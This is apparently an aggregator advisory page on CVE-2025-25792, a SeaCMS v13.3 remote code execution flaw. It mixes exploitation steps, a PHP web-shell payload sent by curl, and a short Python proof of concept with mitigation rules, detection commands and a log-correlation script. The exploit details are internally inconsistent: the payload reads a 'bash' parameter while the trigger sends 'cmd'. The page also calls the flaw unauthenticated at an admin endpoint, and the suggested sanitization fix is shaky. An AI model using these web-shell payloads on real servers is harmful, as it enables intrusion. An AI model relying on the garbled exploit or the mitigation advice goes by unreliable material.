How CVE-2025-25792 Works
SeaCMS v13.3 contains an unauthenticated remote code execution (RCE) vulnerability in `admin_weixin.php`, caused by improper validation of the `isopen` parameter. An attacker can inject PHP code through a crafted HTTP request, and because the input is insufficiently sanitized, that code is later executed on the server. The root cause is a direct file write that includes user-controlled input, which allows arbitrary code execution with the web server's privileges.
DailyCVE Form:
Platform: SeaCMS
Version: v13.3
Vulnerability: RCE
Severity: Critical
Date: 03/28/2025
What Undercode Say:
Exploitation:
1. Craft Payload:
curl -X POST "http://target/admin_weixin.php" -d "isopen=<?php system(\$_GET[bash]); ?>"
2. Trigger Execution:
GET /uploads/weixin_config.php?cmd=id HTTP/1.1
Host: target
Protection:
1. Patch: Apply vendor updates.
2. WAF Rules (nginx location block):
location ~ admin_weixin\.php$ { deny all; }
3. Input Sanitization:
// Encode <, >, & and quotes in the isopen value before it is used
$isopen = htmlspecialchars($_POST['isopen'], ENT_QUOTES);
Detection:
grep -r "isopen" /var/www/seacms/
Mitigation Commands:
1. Restrict Permissions:
chmod 640 admin_weixin.php
2. Log Monitoring:
tail -f /var/log/apache2/access.log | grep "admin_weixin.php"
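An added example, not from the original advisory or the SeaCMS project: the `tail | grep` check above only shows hits on `admin_weixin.php`, so this script correlates a POST to that script with a later query-string request for `weixin_config.php` from the same client. It assumes Apache combined log format, and the sample lines are constructed.

```python
import re

# Apache "combined" format: client, identity, user, [time], "request", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
WRITE_ENDPOINT = "admin_weixin.php"   # script named in the advisory
WRITTEN_FILE = "weixin_config.php"    # file requested in the page's trigger step


def find_suspects(lines):
    """Flag clients that POST to the write endpoint and later request the
    written config file with a query string."""
    posted = {}    # client IP -> timestamp of its first POST to the endpoint
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path, _, query = m["uri"].partition("?")
        name = path.rsplit("/", 1)[-1]
        if m["method"] == "POST" and name == WRITE_ENDPOINT:
            posted.setdefault(m["ip"], m["ts"])
        elif name == WRITTEN_FILE and query and m["ip"] in posted:
            findings.append({
                "ip": m["ip"], "post_at": posted[m["ip"]],
                "hit_at": m["ts"], "uri": m["uri"],
                "status": int(m["status"]),
            })
    return findings


# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Mar/2025:10:01:12 +0000] "POST /admin_weixin.php HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '203.0.113.9 - - [28/Mar/2025:10:01:30 +0000] "GET /uploads/weixin_config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Mar/2025:10:01:41 +0000] "GET /uploads/weixin_config.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"',
    '192.0.2.44 - - [28/Mar/2025:10:05:02 +0000] "POST /admin_weixin.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    'malformed line that should be ignored',
]

if __name__ == "__main__":
    for f in find_suspects(SAMPLE_LOG):
        print(f"{f['ip']}: POST at {f['post_at']}, then {f['uri']} -> {f['status']}")
```

Access logs do not record POST bodies, so this is a request-sequence heuristic; a hit should be followed by inspecting the contents of `weixin_config.php` on disk.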
Exploit Code (PoC):
import requests
target = "http://victim.com/admin_weixin.php"
payload = {"isopen": "<?php exec($_GET[bash]); ?>"}
requests.post(target, data=payload)
Post-Exploit Analysis:
find / -name "weixin_config.php" -exec ls -la {} \;
Patch Verification:
diff -u admin_weixin.php.old admin_weixin.php.new
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25792